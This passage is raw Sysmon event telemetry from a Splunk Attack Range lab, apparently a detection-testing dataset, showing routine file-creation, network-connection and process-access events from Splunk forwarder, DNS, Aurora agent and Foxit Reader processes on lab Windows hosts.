Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95DFE09CEB6AD4965F00FE7120A53798,SHA256=E127D74B370E801AED5D59AA0E52D3907D05CEF1DD93AE536E6AF307045918C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015630Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:43.088{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50057-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015629Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:45.035{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16A239904235788318F51EBF83C6599D,SHA256=8BCBE14FBA057EBFB1C4C906866BF13AFF26619CE12F0CB694AD53D9B79033B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040785Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:46.918{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C07B6BB63FE30517879F2019F299489,SHA256=8EE89DDD7E836E8ED0431FE5F144C6B13ED740634E3B63B463BDA60695F3526A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015631Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:46.114{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A904C8ADCDD7165C8662A9ECBA503ED,SHA256=1CF828E6A1638E14D2C42C25B2B81F5A873C44FC5AD06D4E9E709CF421BF6C24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040787Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:47.979{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64AECA0D1FBCE3D1F3D6421AE1BA8E44,SHA256=EFCE927EE4B7AFBF7D62A52FA3B4F22D5DE41547D08DCAD9E7B7E991595245D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015633Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:47.632{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3B59B3E053D9FCE1BCECC80D4B300293,SHA256=BC6E9DB9923FEA009EA18CE31F3980F112A3430C6B27E2A9F0975D80A61F1C61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015632Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:47.190{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CA3D37E44EE1184CC0DBA8BEC363760,SHA256=E749828B903AC23C74F9186D829BB4D3762577451365FB0BE3AB14D5D050D45C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000040786Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:44.638{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56253-false10.0.1.12-8000- 23542300x800000000000000015634Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:48.287{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1EEADA2112F452D93FF459F772F80DE,SHA256=4510B3E1DC85A4AC68B2CCED37CB1857EB1B3D77A31749E37CC9EB787E68DD7C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000040794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:45.833{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local53domainfalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local57051- 354300x800000000000000040793Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:45.832{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local61303-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local53domain 354300x800000000000000040792Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:45.832{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local53domainfalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local61303- 354300x800000000000000040791Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:45.832{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruea00:10e:0:0:9810:3ff4:6c3:ffff-61303-truea00:10e:0:0:0:0:0:0win-dc-ctus-attack-range-271.attackrange.local53domain 354300x800000000000000040790Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:45.832{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60620- 354300x800000000000000040789Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:45.831{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local49876- 354300x800000000000000040788Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:45.831{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local49876-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domain 23542300x800000000000000015635Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:49.364{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4BF1C9374D73FF41481499F1B012FA1,SHA256=9E82911772B6E33706DF0F74870B2972F5899E06A1DCA78E356CE4E79D3604A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040795Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:49.039{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC241969F4E5D4E0F0F2AE6559ECA3C4,SHA256=452D3D0188B7DD75A7218C27C03B18AB79301B20B40961ACB48F40BA8EFE791F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015637Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:49.056{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50058-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015636Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:50.462{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58B36CA3C2D78A7E02AE02A8781315A2,SHA256=D16712BC5D771318121E27C318038A1768CED86754B8DAC08B1B0A9B5B5F3D24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:50.114{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31B37431F5E5774367CD051861D6FB76,SHA256=33D1BE3725E3BE8BEAE3AD568DDF6455F904DD09076A4C9288A8BA1EF003D26C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015638Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:51.543{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71C60B840FD5EE79B5817DDA5D6E2F36,SHA256=D341A6C1ECBA788761CBAC96C2395BCC43D5C2ADC152C83168D00B235F59D1CE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040824Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.883{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040823Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.881{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040822Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.875{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040821Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.874{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040820Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.870{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040819Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.861{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040818Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.855{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040817Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.850{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040816Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.848{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040815Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.846{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040814Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.845{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040813Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.822{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040812Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040811Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.812{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000040810Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.812{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=515D741B95347408C706D8D4C681538D,SHA256=07D88D9B6FB894BD541B690CB67414B3487FC55DF57882D496C9B4F8FF59AC07,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040809Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.811{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\ADMINI~1\AppData\Local\Temp\etilqs_JdxFYFld8sd9fA5MD5=70A7E674CD8AAFC3782D3458F71DF6B9,SHA256=EDBFA5B9A533B8F30394A75F1D9AE0DA102ED2BF0E8EF6D2C45353856293D1B0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040808Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.801{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=89B63BF9171A790249D1B1BDF3B5F9FF,SHA256=38A0B76F55F13046CC00877B9E7F56E9B579CE7629793CA01AF585399FB27C17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040807Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.798{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040806Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.791{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040805Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.777{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program 